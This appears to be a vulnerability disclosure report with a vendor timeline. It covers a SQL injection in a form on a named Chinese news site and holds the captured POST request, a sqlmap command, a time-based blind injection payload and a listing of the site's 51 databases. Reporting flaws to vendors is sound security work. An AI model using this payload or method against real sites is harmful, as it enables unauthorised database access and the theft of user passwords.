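2015-12-30: Details reported to the vendor; awaiting vendor handling
2015-12-30: Vendor confirmed; details disclosed to the vendor only
2016-01-09: Details disclosed to core white hats and experts in related fields
2016-01-19: Details disclosed to regular white hats
2016-01-29: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public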
As the title says.
post.txt
POST /2013xjj/submit.php HTTP/1.1
Content-Length: 391
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://mindiao.cjn.cn:80/
Cookie: PHPSESSID=vmmpv1si1kbpq33vcpcr05lvc1
Host: mindiao.cjn.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Submit=%e6%8f%90%20%20%20%e4%ba%a4&beizhu=%e5%8e%9f%e5%88%9b&bianju=1&company=Acunetix&content=1&daoyan=1&jmmc=1&phone=1&realname=jrwfwmba&shouji=1&sjcd=1&typename=%e4%b8%93%e4%b8%9a%e7%bb%84&xjxs=%e8%af%9d%e5%89%a7&yanyuan=1&yclx=%e5%a4%9a%e5%b9%95%e5%89%a7
sqlmap.py -r post.txt --dbs
sqlmap identified the following injection point(s) with a total of 1419 HTTP(s) requests:
---
Parameter: beizhu (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: Submit=%e6%8f%90 %e4%ba%a4&beizhu=%e5%8e%9f%e5%88%9b' AND (SELECT * FROM (SELECT(SLEEP(5)))Yqzd) AND 'gEEt'='gEEt&bianju=1&company=Ae5%a4%9a%e5%b9%95%e5%89%a7
---
[23:00:39] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[23:00:39] [INFO] fetching database names
[23:00:39] [INFO] fetching number of databases
[23:00:39] [INFO] retrieved:
[23:00:39] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
51
available databases [51]:
[*] `#mysql50#cjntj.bak`
[*] `#mysql50#cjnvote.bak`
[*] `#mysql50#phpwind.bak`
[*] cc
[*] ccvms
[*] cjnphoto
[*] cjnvote
[*] collabtive
[*] dwz
[*] information_schema
[*] maps
[*] mingpai
[*] mysql
[*] myt
[*] newdata_user
[*] osfc
[*] phpstat_mysql_10_mysql
[*] phpstat_mysql_10_mysql_log
[*] phpstat_mysql_1_mysql
[*] phpstat_mysql_1_mysql_log
[*] phpstat_mysql_2_mysql
[*] phpstat_mysql_2_mysql_log
[*] phpstat_mysql_3_mysql
[*] phpstat_mysql_3_mysql_log
[*] phpstat_mysql_4_mysql
[*] phpstat_mysql_4_mysql_log
[*] phpstat_mysql_5_mysql
[*] phpstat_mysql_5_mysql_log
[*] phpstat_mysql_6_mysql
[*] phpstat_mysql_6_mysql_log
[*] phpstat_mysql_7_mysql
[*] phpstat_mysql_7_mysql_log
[*] phpstat_mysql_8_mysql
[*] phpstat_mysql_8_mysql_log
[*] phpstat_mysql_9_mysql
[*] phpstat_mysql_9_mysql_log
[*] phpstat_mysql_mysql
[*] phpstat_web
[*] phpwind
[*] phpwindcs
[*] test
[*] TriAquae
[*] tweibo
[*] veryvote
[*] vsftpduser
[*] wh4z
[*] whwx
[*] wordpress
[*] xweibo
[*] xweibo2x
[*] zhenhao
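This affects the databases of the entire site.
Databases:
Tables in the current database. This can lead to the leak of 70,000 users' passwords.
Passwords:
You are the professionals here.
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-12-30 11:02
Thanks
None yet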